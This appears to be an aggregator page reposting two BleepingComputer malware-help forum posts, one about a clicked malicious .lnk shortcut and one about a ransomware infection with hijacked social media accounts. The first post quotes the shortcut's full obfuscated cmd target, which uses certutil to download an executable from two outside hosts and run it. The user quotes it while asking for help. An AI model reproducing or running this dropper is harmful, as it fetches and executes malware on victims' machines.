Featured Post

.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer

Image
.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputerPosted: 06 Jul 2020 11:33 AM PDT Hi all,Looking for feedback on the likelihood my double clicking of a bad .lnk file caused damage.. When I did double click it, I remember getting a standard windows dialog box. I believe it said the path did not exist or shortcut unavailable.. I'm not finding anything in my startup folder for C:\programdata or my username appdata startup folder...  I ran scans with malwarebytes, Hitman with no results.The .lnk file target was:%ComSpec% /v:on/c(SET V4=/?8ih5Oe0vii2dJ179aaaacabbckbdbhhe=gulches_%PROCESSOR_ARCHITECTURE% !H!&SET H="%USERNAME%.exe"&SET V4adKK47=certutil -urlcache -f https://&IF NOT EXIST !H! (!V4adKK47!izub.fun!V4!||!V4adKK47!de.charineziv.com!V4!&!H!))>nul 2>&1The .lnk file 'start-in' was:"%APPDATA%\Mic…

Trojan and Ransomware infection and personal accounts being breached - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer

This past week my PC got infected with a virus after I ran a crack file (stupid ofc).
I had disabled the antivirus (Kaspersky basic) to install it and suddenly random google pages start showing up and the computer gets really slow.I opened the antivirus and it detected some Trojans and some adware, but it couldn't eliminate it. I then noticed my files had a .koti extension and I couldn't open them, so I saved them to an usb device. I verified them on Emsisoft's website, but apparently they are a recent version which can't be decrypted. I didn't find any ransom note whatsoever in my files.

The pc was really slow and irreponsive and I needed it for uni, but somehow I managed to factory reset it.
I installed Kaspersky, Malwarebytes, Hitman Alert(which I now removed) and Emsisoft Anti-Malware. I ran them and they detected some adware, which was apparently from chrome, so I reseted all cookies,extensions and sync data and it seemed to be clear.

The next day in my facebook account I found a login attempt from Russia and my cover photo had disappeared.
I changed the password, activated 2 factor verifications.
Yesterday, I go to my instagram account and there are 2 posted pictures from some sunglasses advertising and some of the accounts I follow tagged in. There was also a login from EUA, which I logged out.

I changed the password for Instagram again and activated a 2 factor verification (which I hadn't done for insta).
I changed all the emails passwords (connected to facebook and insta) and inserted a 2 fator verification too. I installed ESET for my phone too.
I do have a bit of basic knowledge but I'm nowhere near an informed person on this subject.
I fear that this might happen again and that my accounts are not safe at all with all the changes I've made and I really don't want to have to delete them.
I would really appreciate some help on this. Thank you



https://ift.tt/3bZMZzi

Comments

Popular Posts

System detected an overrun of a stack-based buffer in this application [FIX] - Windows Report

Valorant anti-cheat lead answers many questions on Reddit - Millenium US